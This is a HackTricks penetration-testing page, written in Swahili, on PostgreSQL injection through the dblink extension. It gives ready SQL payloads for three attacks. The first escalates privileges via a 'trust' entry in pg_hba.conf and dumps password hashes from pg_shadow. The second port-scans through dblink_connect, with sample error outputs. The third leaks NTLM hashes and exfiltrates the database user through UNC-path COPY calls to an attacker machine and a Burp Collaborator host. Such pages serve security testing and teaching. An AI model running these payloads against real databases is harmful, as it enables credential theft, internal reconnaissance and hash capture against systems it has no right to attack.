hacktricks/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md

# Network - Privesc, Port Scanner and NTLM chanllenge response disclosure

{{#include ../../../banners/hacktricks-training.md}}

**Pata** [**maelezo zaidi kuhusu mashambulizi haya katika karatasi asilia**](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt).

Tangu **PostgreSQL 9.1**, ufungaji wa moduli za ziada ni rahisi. [Marekebisho yaliyoandikishwa kama `dblink`](https://www.postgresql.org/docs/current/contrib.html) yanaweza kufungwa kwa kutumia [`CREATE EXTENSION`](https://www.postgresql.org/docs/current/sql-createextension.html):
```sql
CREATE EXTENSION dblink;
```
Mara tu umepakia dblink unaweza kuwa na uwezo wa kufanya hila za kuvutia:

### Kuinua Mamlaka

Faili `pg_hba.conf` inaweza kuwa imewekwa vibaya **ikikubali muunganisho** kutoka **localhost kama mtumiaji yeyote** bila kuhitaji kujua nenosiri. Faili hii inaweza kupatikana kawaida katika `/etc/postgresql/12/main/pg_hba.conf` na usanidi mbaya unaonekana kama:
```
local    all    all    trust
```
_Kumbuka kwamba usanidi huu hutumiwa mara nyingi kubadilisha nenosiri la mtumiaji wa db wakati msimamizi analisahau, hivyo wakati mwingine unaweza kuliona._\
_Kumbuka pia kwamba faili pg_hba.conf inaweza kusomwa tu na mtumiaji na kikundi cha postgres na inaweza kuandikwa tu na mtumiaji wa postgres._

Kesi hii ni **faida ikiwa** tayari una **shell** ndani ya mwathirika kwani itakuruhusu kuungana na hifadhidata ya postgresql.

Makosa mengine yanayoweza kutokea ni kama ifuatavyo:
```
host    all     all     127.0.0.1/32    trust
```
Kwa sababu itaruhusu kila mtu kutoka kwenye localhost kuungana na database kama mtumiaji yeyote.\
Katika kesi hii na ikiwa kazi ya **`dblink`** inafanya **kazi**, unaweza **kuinua mamlaka** kwa kuungana na database kupitia muunganisho ulioanzishwa tayari na kufikia data ambayo haupaswi kuwa na uwezo wa kufikia:
```sql
SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'SELECT datname FROM pg_database')
RETURNS (result TEXT);

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'select usename, passwd from pg_shadow')
RETURNS (result1 TEXT, result2 TEXT);
```
### Port Scanning

Kwa kutumia `dblink_connect` unaweza pia **kutafuta bandari zilizo wazi**. Ikiwa hiyo **kazi haifanyi kazi unapaswa kujaribu kutumia `dblink_connect_u()` kama hati inavyosema kwamba `dblink_connect_u()` ni sawa na `dblink_connect()`, isipokuwa itaruhusu watumiaji wasiokuwa wasimamizi kuungana kwa kutumia njia yoyote ya uthibitishaji\_.
```sql
SELECT * FROM dblink_connect('host=216.58.212.238
port=443
user=name
password=secret
dbname=abc
connect_timeout=10');
//Different response
// Port closed
RROR:  could not establish connection
DETAIL:  could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 4444?

// Port Filtered/Timeout
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTP server
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTPS server
ERROR:  could not establish connection
DETAIL:  received invalid response to SSL negotiation:
```
Kumbuka kwamba **kabla** ya kuwa na uwezo wa kutumia `dblink_connect` au `dblink_connect_u` unaweza kuhitaji kutekeleza:
```
CREATE extension dblink;
```
### UNC njia - kufichuliwa kwa NTLM hash
```sql
-- can be used to leak hashes to Responder/equivalent
CREATE TABLE test();
COPY test FROM E'\\\\attacker-machine\\footestbar.txt';
```

```sql
-- to extract the value of user and send it to Burp Collaborator
CREATE TABLE test(retval text);
CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
DECLARE sqlstring TEXT;
DECLARE userval TEXT;
BEGIN
SELECT INTO userval (SELECT user);
sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
EXECUTE sqlstring;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT testfunc();
```
{{#include ../../../banners/hacktricks-training.md}}